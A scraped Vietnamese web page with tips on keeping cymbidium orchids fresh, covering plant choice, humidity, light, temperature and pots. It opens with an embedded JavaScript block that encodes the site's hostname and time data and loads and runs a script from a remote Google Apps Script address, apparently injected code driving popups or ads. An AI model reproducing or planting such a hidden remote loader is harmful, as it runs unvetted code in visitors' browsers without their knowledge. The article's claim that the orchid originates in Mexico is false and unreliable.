var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Gợi ý cách giữ hoa địa lan tươi lâu hàng đầu 2023

Đối với những người chơi hoa chuyên nghiệp, việc giữ hoa tươi lâu là việc rất đơn giản. Tuy nhiên với những người chơi không chuyên thì đó lại là vấn đề không hề dễ dàng.

Hoa địa lan là một loài hoa thuộc vào họ Phong Lan. Cây Địa Lan là cây thân thảo lâu năm, cao khoảng 0.3 – 1.5m. Cây địa lan có thân giả to. Lá mọc thành lùm, hình dải và sừng. Cuống hoa mọc từ thân giả, mỗi cuống gồm 8 – 16 hoa. Địa lan gồm các màu như: đỏ, vàng, xanh, trắng và màu thứ sinh.

Lan thường nở hoa vào tháng 2 – 3 hằng năm. Chúng có nguồn gốc từ đất nước Mexico và mang một vẻ đẹp khiến cho bất kỳ ai gặp dù có một lần cũng không thể nào quên được.

Hoa địa lan biểu tượng cho sự thanh lịch, quyền quý, sang trọng và xa hoa. Ngoài ra, loài hoa này còn giúp người ta liên tưởng đến sự xinh đẹp của núi rừng thiêng liêng, sự an nhiên trong gia đình. Chính vì lẽ đó mà người Việt Nam thường mua hoa để tặng người thân, hoặc chưng trong nhà vào những dịp đặc biệt.

Các cách giữ hoa địa lan tươi lâu.

Đối với những người chơi hoa chuyên nghiệp, việc giữ hoa tươi lâu là việc rất đơn giản. Tuy nhiên với những người chơi không chuyên thì đó lại là vấn đề không hề dễ dàng. Vì thế, các bạn cần phải trang bị cho mình một vài “mẹo” nhỏ để việc giúp hoa tươi lâu dễ dàng hơn.

Chọn cây địa lan để mua

Việc đầu tiên để địa lan tươi lâu thì việc mua cây phù hợp rất quan trọng. Bạn nên ưu tiên mua cây được trồng sẵn trong chậu được một khoảng thời gian. Nếu trên bề mặt của của chậu có lớp rêu xanh tốt thì nghĩa là cây đã được trồng lâu trong chậu. Điều này đảm bảo được độ ẩm, chất dinh dưỡng để cây phát triển.

Ngoài ra, các bạn cũng nên chọn những cây có nhiều bẹ. Vì như thế là cây có gốc chắc chắn, khỏe mạnh. Thân không được có màu đen, bị sâu cắn và thối rữa. Bộ rễ chính là yếu tố quyết định sự phát triển của cây, nên ưu tiên lựa chọn những cây có bộ rễ nhiều, to khỏe, không có dấu hiệu bị thối, gãy.

>>> Có thể bạn quan tâm: 3 điều cần chú ý khi chăm sóc lan ghép gốc

Đặc biệt, nguyên tắc chọn hoa mà các bạn không thể bỏ qua là chọn những hoa chỉ mới chớm nở. Tuổi thọ của hoa cũng từ đó được kéo dài hơn những chậu hoa đã nở bung ra.

Cách chăm sóc địa lan để hoa tươi lâu

Một loài hoa khi muốn tươi lâu, thì việc chọn cây thích hợp, các bạn cần chăm sóc đúng cách thì chúng mới phát triển và tươi lâu.

Các yếu tố mà các bạn cần đáp ứng cho cây là:

  • Độ ẩm: từ 70-85%. Nên làm giàn giá thể tơi xốp để giữ độ ẩm tốt cho địa lan, tưới nước đúng lúc, phun thuốc trừ bệnh cho địa lan.
  • Ánh sáng: ở mức 50 – 70%, không để cây trực tiếp dưới ánh nắng mặt trời. Nên làm hoa giàn hướng Đông, cây được tiếp xúc với ánh ban mai, tránh được nắng chiều.
  • Nhiệt độ: thích hợp nhất là từ 20 – 30 độ C.
  • Không gian: thông thoáng, có gió để các vi khuẩn không tiếp xúc được. Các mầm bệnh từ đó cũng không thể sinh sôi và phát triển.
  • Đáp ứng được các thiết bị: máy làm ẩm và máy hút không khí.

Các cách đơn giản để hoa địa lan tươi lâu hơn

Để hoa được tươi lâu hơn, khi tưới hoa không nên để nước bắn lên hoa. Bởi khi cánh hoa bị dính nước thì hoa rất dễ bị tình trạng úng và thối, gãy rụng. Các bạn nên để hoa ở chỗ có mái che, để tránh mưa, sương bắn vào chậu hoa.

Địa lan nên được trồng trong chậu có lỗ dưới đáy, xung quanh và có độ lớn phù hợp. Các loại chậu được khuyên dùng là chậu sành sứ, vừa đẹp, lại vừa sạch sẽ, giữ ẩm tốt, thoáng khí. Giá thể thường được dùng trong trồng lan là rêu tươi, hạt sứ, vỏ dừa, gỗ mục, than củi.

>>> Đọc thêm: Cách trồng và chăm sóc lan Căn Diệp – một loài lan quý, độc và lạ

Bên trên là một vài cách giữ hoa địa lan tươi lâu hơn thông thường, người chơi có thể chơi được trong thời gian dài, giúp cho gia đình có thêm một không gian tươi vui, rực rỡ bên cạnh loài hoa địa lan này nhé.